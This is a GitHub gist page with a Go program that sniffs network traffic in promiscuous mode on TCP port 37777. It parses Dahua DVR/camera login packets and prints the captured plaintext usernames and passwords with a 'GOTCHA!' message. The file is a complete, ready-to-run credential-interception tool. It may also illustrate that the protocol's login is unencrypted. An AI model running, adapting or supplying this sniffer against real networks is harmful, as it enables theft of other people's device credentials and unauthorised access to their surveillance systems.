-
-
Save racerxdl/a23403a803886983d94fa82531cf86d6 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package main | |
import ( | |
"bytes" | |
"encoding/binary" | |
"github.com/google/gopacket" | |
"github.com/google/gopacket/pcap" | |
"github.com/quan-to/slog" | |
) | |
var log = slog.Scope("Dahua") | |
var networkInterface = "wlp3s0" | |
type LoginPacket struct { | |
PacketType uint16 // 0x00A0 -- Hardcoded on Dahua | |
Unk0 uint16 // 0x6000 -- Hardcoded on Dahua | |
Unk1 uint32 // 0x00000000 | |
Username [8]byte // admin | |
Password [8]byte // admin | |
Unk2 uint32 // 0x00030204 | |
Unk3 uint32 // 0xAAA10100 | |
} | |
func main() { | |
log.Info("Opening %s in promisc mode", networkInterface) | |
handle, err := pcap.OpenLive(networkInterface, 1600, true, pcap.BlockForever) | |
if err != nil { | |
log.Fatal(err) | |
} | |
err = handle.SetBPFFilter("tcp and port 37777") | |
if err != nil { | |
log.Fatal("Cannot set filter: %s", err) | |
} | |
src := gopacket.NewPacketSource(handle, handle.LinkType()) | |
log.Info("Waiting") | |
gotLogin := false | |
for packet := range src.Packets() { | |
t := packet.TransportLayer() | |
if t == nil { | |
continue | |
} | |
payload := t.LayerPayload() | |
if len(payload) == 0 { | |
continue | |
} | |
ptype := binary.LittleEndian.Uint16(payload[:2]) | |
if ptype == 0xA0 { // Login Packet | |
l := &LoginPacket{} | |
err = binary.Read(bytes.NewReader(payload), binary.LittleEndian, l) | |
if err != nil { | |
log.Error("Error parsing login packet: %s", err) | |
continue | |
} | |
gotLogin = true | |
log.Warn("GOTCHA! Username: %s - Password: %s", l.Username, l.Password) | |
} else if ptype == 0xBC && gotLogin { | |
log.Warn("Got login, and stream data. Closing it...") | |
break | |
} | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment